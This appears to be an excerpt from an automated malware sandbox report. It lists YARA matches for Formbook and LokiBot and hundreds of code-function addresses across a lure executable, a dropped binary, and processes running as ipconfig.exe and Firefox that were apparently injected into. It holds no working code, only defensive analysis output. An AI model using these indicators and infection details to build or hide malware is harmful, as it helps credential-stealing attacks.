        Source: 0000001B.00000002.29451748802.0000000000060000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000018.00000000.28477585132.0000000022327000.00000004.00020000.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B3FAE61_2_02B3FAE6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B3FFB41_2_02B3FFB4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 1_2_02B41DFF1_2_02B41DFF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E970EAD10_2_1E970EAD
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C1EB210_2_1E8C1EB2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E979ED210_2_1E979ED2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B2EE810_2_1E8B2EE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E902E4810_2_1E902E48
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E0E5010_2_1E8E0E50
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E960E6D10_2_1E960E6D
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97EFBF10_2_1E97EFBF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E971FC610_2_1E971FC6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C6FE010_2_1E8C6FE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CCF0010_2_1E8CCF00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97FF6310_2_1E97FF63
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E959C9810_2_1E959C98
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D8CDF10_2_1E8D8CDF
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFCE010_2_1E8DFCE0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E98ACEB10_2_1E98ACEB
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E947CE810_2_1E947CE8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B0C1210_2_1E8B0C12
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CAC2010_2_1E8CAC20
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96EC4C10_2_1E96EC4C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C3C6010_2_1E8C3C60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97EC6010_2_1E97EC60
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E976C6910_2_1E976C69
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D2DB010_2_1E8D2DB0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C9DD010_2_1E8C9DD0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95FDF410_2_1E95FDF4
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BAD0010_2_1E8BAD00
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97FD2710_2_1E97FD27
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E977D4C10_2_1E977D4C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0D6910_2_1E8C0D69
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97FA8910_2_1E97FA89
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DFAA010_2_1E8DFAA0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97CA1310_2_1E97CA13
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97EA5B10_2_1E97EA5B
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E934BC010_2_1E934BC0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8FDB1910_2_1E8FDB19
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C0B1010_2_1E8C0B10
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97FB2E10_2_1E97FB2E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8D688210_2_1E8D6882
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9398B210_2_1E9398B2
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C28C010_2_1E8C28C0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9718DA10_2_1E9718DA
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9778F310_2_1E9778F3
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C380010_2_1E8C3800
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8EE81010_2_1E8EE810
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96083510_2_1E960835
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8A686810_2_1E8A6868
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E93587010_2_1E935870
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97F87210_2_1E97F872
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C987010_2_1E8C9870
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DB87010_2_1E8DB870
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BE9A010_2_1E8BE9A0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97E9A610_2_1E97E9A6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9059C010_2_1E9059C0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8899E810_2_1E8899E8
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C068010_2_1E8C0680
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97A6C010_2_1E97A6C0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97F6F610_2_1E97F6F6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8BC6E010_2_1E8BC6E0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9336EC10_2_1E9336EC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DC60010_2_1E8DC600
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95D62C10_2_1E95D62C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96D64610_2_1E96D646
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8E467010_2_1E8E4670
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97675710_2_1E976757
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C276010_2_1E8C2760
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CA76010_2_1E8CA760
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E92D48010_2_1E92D480
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C044510_2_1E8C0445
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9775C610_2_1E9775C6
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97F5C910_2_1E97F5C9
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E98A52610_2_1E98A526
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AD2EC10_2_1E8AD2EC
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E88224510_2_1E882245
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97124C10_2_1E97124C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B138010_2_1E8B1380
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CE31010_2_1E8CE310
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E97F33010_2_1E97F330
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8F508C10_2_1E8F508C
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8B00A010_2_1E8B00A0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8CB0D010_2_1E8CB0D0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E9770F110_2_1E9770F1
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E96E07610_2_1E96E076
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8C51C010_2_1E8C51C0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8DB1E010_2_1E8DB1E0
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E98010E10_2_1E98010E
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E8AF11310_2_1E8AF113
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E95D13010_2_1E95D130
        Source: C:\Users\user\Desktop\BL_CI_PL.exeCode function: 10_2_1E90717A10_2_1E90717A
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A1138014_2_03A11380
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADF33014_2_03ADF330
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2E31014_2_03A2E310
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A0D2EC14_2_03A0D2EC
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_039E224514_2_039E2245
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD124C14_2_03AD124C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3B1E014_2_03A3B1E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A251C014_2_03A251C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ABD13014_2_03ABD130
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AE010E14_2_03AE010E
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A0F11314_2_03A0F113
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A6717A14_2_03A6717A
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A100A014_2_03A100A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A5508C14_2_03A5508C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD70F114_2_03AD70F1
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2B0D014_2_03A2B0D0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ACE07614_2_03ACE076
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2276014_2_03A22760
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2A76014_2_03A2A760
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD675714_2_03AD6757
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2068014_2_03A20680
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A1C6E014_2_03A1C6E0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A936EC14_2_03A936EC
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADF6F614_2_03ADF6F6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADA6C014_2_03ADA6C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ABD62C14_2_03ABD62C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3C60014_2_03A3C600
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A4467014_2_03A44670
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ACD64614_2_03ACD646
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADF5C914_2_03ADF5C9
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD75C614_2_03AD75C6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AEA52614_2_03AEA526
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A8D48014_2_03A8D480
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2044514_2_03A20445
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A94BC014_2_03A94BC0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADFB2E14_2_03ADFB2E
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A20B1014_2_03A20B10
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A5DB1914_2_03A5DB19
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3FAA014_2_03A3FAA0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADFA8914_2_03ADFA89
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADCA1314_2_03ADCA13
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADEA5B14_2_03ADEA5B
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A1E9A014_2_03A1E9A0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADE9A614_2_03ADE9A6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A659C014_2_03A659C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_039E99E814_2_039E99E8
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A998B214_2_03A998B2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3688214_2_03A36882
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD78F314_2_03AD78F3
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A228C014_2_03A228C0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD18DA14_2_03AD18DA
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AC083514_2_03AC0835
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2380014_2_03A23800
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A4E81014_2_03A4E810
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A0686814_2_03A06868
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2987014_2_03A29870
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3B87014_2_03A3B870
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A9587014_2_03A95870
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADF87214_2_03ADF872
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADEFBF14_2_03ADEFBF
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A26FE014_2_03A26FE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD1FC614_2_03AD1FC6
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2CF0014_2_03A2CF00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADFF6314_2_03ADFF63
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD0EAD14_2_03AD0EAD
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A21EB214_2_03A21EB2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A12EE814_2_03A12EE8
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD9ED214_2_03AD9ED2
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AC0E6D14_2_03AC0E6D
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A62E4814_2_03A62E48
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A40E5014_2_03A40E50
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A32DB014_2_03A32DB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ABFDF414_2_03ABFDF4
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A29DD014_2_03A29DD0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADFD2714_2_03ADFD27
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A1AD0014_2_03A1AD00
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A20D6914_2_03A20D69
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD7D4C14_2_03AD7D4C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AB9C9814_2_03AB9C98
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AA7CE814_2_03AA7CE8
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A3FCE014_2_03A3FCE0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AEACEB14_2_03AEACEB
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A38CDF14_2_03A38CDF
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A2AC2014_2_03A2AC20
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A10C1214_2_03A10C12
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03A23C6014_2_03A23C60
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03AD6C6914_2_03AD6C69
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ADEC6014_2_03ADEC60
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_03ACEC4C14_2_03ACEC4C
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3BE9F14_2_02F3BE9F
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F22FB014_2_02F22FB0
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F3CF4014_2_02F3CF40
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F28C8014_2_02F28C80
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F28C7B14_2_02F28C7B
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F22D9014_2_02F22D90
        Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 14_2_02F22D8714_2_02F22D87
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A7FAE623_2_02A7FAE6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A7FFB423_2_02A7FFB4
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 23_2_02A81DFF23_2_02A81DFF
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_0000020622240D0224_2_0000020622240D02
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223A35924_2_000002062223A359
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223A36224_2_000002062223A362
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223E7B224_2_000002062223E7B2
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_00000206222398FB24_2_00000206222398FB
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223C30224_2_000002062223C302
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223C2FF24_2_000002062223C2FF
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223990224_2_0000020622239902
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 24_2_000002062223FF0624_2_000002062223FF06
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 25_2_02BCFAE625_2_02BCFAE6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 25_2_02BCFFB425_2_02BCFFB4
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 25_2_02BD1DFF25_2_02BD1DFF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C1EB226_2_1E8C1EB2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E979ED226_2_1E979ED2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E963FA026_2_1E963FA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E971FC626_2_1E971FC6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E93FF4026_2_1E93FF40
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97FF6326_2_1E97FF63
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E959C9826_2_1E959C98
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8DFCE026_2_1E8DFCE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E947CE826_2_1E947CE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C3C6026_2_1E8C3C60
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C9DD026_2_1E8C9DD0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E95FDF426_2_1E95FDF4
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97FD2726_2_1E97FD27
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E973D2226_2_1E973D22
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E977D4C26_2_1E977D4C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97FA8926_2_1E97FA89
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8DFAA026_2_1E8DFAA0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E951B8026_2_1E951B80
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8FDB1926_2_1E8FDB19
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97FB2E26_2_1E97FB2E
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9398B226_2_1E9398B2
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9718DA26_2_1E9718DA
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9778F326_2_1E9778F3
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C380026_2_1E8C3800
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E93587026_2_1E935870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97F87226_2_1E97F872
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C987026_2_1E8C9870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8DB87026_2_1E8DB870
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9059C026_2_1E9059C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97F6F626_2_1E97F6F6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9336EC26_2_1E9336EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96162326_2_1E961623
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E95D62C26_2_1E95D62C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E96D64626_2_1E96D646
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E95549026_2_1E955490
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E92D48026_2_1E92D480
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9775C626_2_1E9775C6
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97F5C926_2_1E97F5C9
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8AD2EC26_2_1E8AD2EC
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97124C26_2_1E97124C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8B138026_2_1E8B1380
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97F33026_2_1E97F330
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8F508C26_2_1E8F508C
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CB0D026_2_1E8CB0D0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E9770F126_2_1E9770F1
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C51C026_2_1E8C51C0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8DB1E026_2_1E8DB1E0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8AF11326_2_1E8AF113
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E95D13026_2_1E95D130
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E90717A26_2_1E90717A
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E970EAD26_2_1E970EAD
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8B2EE826_2_1E8B2EE8
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E902E4826_2_1E902E48
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8E0E5026_2_1E8E0E50
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E960E6D26_2_1E960E6D
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E97EFBF26_2_1E97EFBF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8C6FE026_2_1E8C6FE0
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8CCF0026_2_1E8CCF00
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E8D8CDF26_2_1E8D8CDF
        Source: C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exeCode function: 26_2_1E98ACEB26_2_1E98ACEB
